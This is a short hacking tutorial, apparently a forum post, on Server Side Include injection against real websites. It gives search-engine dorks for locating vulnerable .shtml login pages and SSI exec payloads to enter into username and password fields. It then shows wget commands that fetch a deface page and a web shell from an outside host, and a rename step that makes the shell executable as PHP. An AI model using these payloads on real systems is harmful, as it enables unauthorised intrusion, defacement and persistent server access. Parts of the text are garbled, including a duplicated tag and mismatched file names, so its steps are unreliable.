SSI (Server Side Include) Injection and shell uploading tutorial

Server Side Include is a web application exploit which give grant us access to upload files remotely to vuln. sites. File uploading is multi-extension exception is .php,you cannot execute your shell in .php form

• First step is finding vulnerable site by GOOGLE/BING DORKS:-

inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=

If the Dorks doesn't work then find the sites manually by the following commands codes :-

• Manual Injection:- Put the following codes in  field of USERNAME & PASSWORD

1. <!--#echo var="DATE_LOCAL" -->  IT WILL SHOW DATE 
2. <!--#exec cmd="whoami"--> IT WILL SHOW RUNNING USER ON THE SERVER
3. <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> IN LINUX ONLY
   IT WILL SHOW DIRECTORY FILES
4. <!-- #exec cmd="dir" --> WINDOWS ONLY, DISPLAY DIRECTORY FILES

• After finding a vulnerable loop in site it's time to upload your deface page or shell.
• First find a host provider  where you can upload your deface like best one is pastehtml.com
• Now enter the following code in USERNAME AND PASSWORD
  <!--#exec cmd="wget http://website.com/deface.html" -->
• Then by this code your deface will be be upload to view your deface page go to the http://website.com/deface.html

How to Upload shell in the site-

• First Host your shell in .txt format on any site..
• Then Enter the following code in login page<!--#exec cmd="wget http://website.com/shell.txt" -->
• Check either your shell.txt is uploaded or not by this code 
  <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
  
• In File Extension change your shell.txt to shell.php by the help of this command
  <!--#exec cmd="mv abc.txt abc.php" -->  
• Now you can access your shell by this link site.com/shell.php

COMMENT HERE ! FOR ANY DOUBT